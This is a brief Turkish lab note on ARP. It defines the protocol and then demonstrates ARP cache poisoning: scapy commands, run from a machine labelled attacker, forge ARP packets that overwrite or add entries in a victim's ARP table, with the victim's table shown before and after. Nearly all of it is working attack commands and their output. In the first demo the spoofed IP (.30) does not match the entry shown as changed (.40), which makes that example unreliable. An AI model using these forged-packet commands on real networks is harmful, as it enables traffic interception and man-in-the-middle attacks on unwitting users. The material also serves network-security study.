# ARP

Adres Çözümleme Protokolü (Address Resolution Protocol) ağ katmanı adreslerinin
veri bağlantısı katmanı adreslerine (IP adreslerinin MAC adreslerine)
çözümlenmesini sağlayan bir iletişim protokolüdür

**[!] Daha önceden ekli olmayan mac adresinin ip adresi değiştirilemez**

## ARP tablosunda IP adresini değiştirmek için

```
(kurban) $ arp -an
? (192.168.42.40) at 08:00:27:54:f1:62 [ether] on enp0s16u2
```
```
(saldırgan) $ scapy
>>> etherbaslik= Ether(dst="ea:0e:3d:8f:cc:e0",src="31:30:31:31:31:31")
>>> arpbaslik = ARP(op=2, hwsrc="31:30:31:31:31:31",psrc="192.168.42.30",pdst="192.168.42.57")
>>> paket = etherbaslik/arpbaslik
>>> sendp(paket,iface="enp0s8")
.
Sent 1 packets.
```
```
(kurban) $ arp -an
? (192.168.42.40) at 31:30:31:31:31:31 [ether] on enp0s16u2

```
---
## ARP tablosuna IP eklemek için

```
(kurban) $ arp -an
 ? (192.168.42.129) at 8e:5d:7a:f1:c0:4f [ether] on enp0s16u2
```
```
(saldırgan) $ scapy
>>> etherbaslik= Ether(dst="ff:ff:ff:ff:ff:ff",src="08:00:27:54:f1:62")
>>> arpbaslik = ARP(op=1, hwsrc="08:00:27:54:f1:61",psrc="192.168.42.40",pdst="192.168.42.57")
>>> paket = etherbaslik/arpbaslik
>>> sendp(paket,iface="enp0s8")
.
Sent 1 packets.

```
```
(kurban) $ arp -an
 ? (192.168.42.129) at 8e:5d:7a:f1:c0:4f [ether] on enp0s16u2
 ? (192.168.42.40) at 08:00:27:54:f1:61 [ether] on enp0s16u2
```
